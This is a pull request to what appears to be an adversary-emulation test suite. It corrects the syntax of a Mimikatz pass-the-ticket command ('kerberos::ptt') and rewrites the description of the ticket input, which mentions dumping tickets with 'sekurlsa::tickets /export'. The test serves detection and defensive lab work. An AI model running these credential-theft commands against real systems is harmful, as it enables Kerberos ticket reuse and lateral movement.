### PR TITLE
T1550.003 pass the ticket by mimikatz patch

### DIFF
--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -40,7 +40,7 @@ Similar to PTH, but attacking Kerberos
 
 
 ```cmd
-#{mimikatz_exe} # "kerberos::ptt #{ticket}"
+#{mimikatz_exe} "kerberos::ptt #{ticket}"
 ```
 
 

--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -32,7 +32,7 @@ Similar to PTH, but attacking Kerberos
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| ticket | Ticket file name usually format of 'id-username@domain.kirbi' (E.g can dumped by "sekurlsa::tickets /export" module) | String | |
+| ticket | Ticket file name usually format of 'id-username\@domain\.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | |
 | mimikatz_exe | Path of the Mimikatz binary | Path | PathToAtomicsFolder&#92;T1550.003&#92;bin&#92;mimikatz.exe|
 
 

--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -31,5 +31,5 @@ atomic_tests:
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
   executor:
     command: |
-      #{mimikatz_exe} # "kerberos::ptt #{ticket}"
+      #{mimikatz_exe} "kerberos::ptt #{ticket}"
     name: command_prompt

--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -31,5 +31,5 @@ atomic_tests:
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
   executor:
     command: |
-      #{mimikatz_exe} # "kerberos::ptt #{user_name}@#{domain}"
+      #{mimikatz_exe} # "kerberos::ptt #{ticket}"
     name: command_prompt


### PR DESCRIPTION
Hello team,

**Details:**
The previous command fails to execute this mimikatz module.
_#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}_
This separates the command like 
$#{mimikatz_exe} -> launch mimikatz console
mimikatz $ #                                                -> error
mimikatz $ kerberos::ptt                            -> error by no argument
mimikatz $ #{user_name}@#{domain}     -> error by no such module

In addition, this techniques is about Pass the Ticket , thus I modified the argument description to understand more easily.

**Testing:**
I have done the test on my local Lab built with DetectionLab (https://github.com/clong/DetectionLab)

**Associated Issues:**
I didn't find the associated issue related to this at the present.

Thank you.
Best regards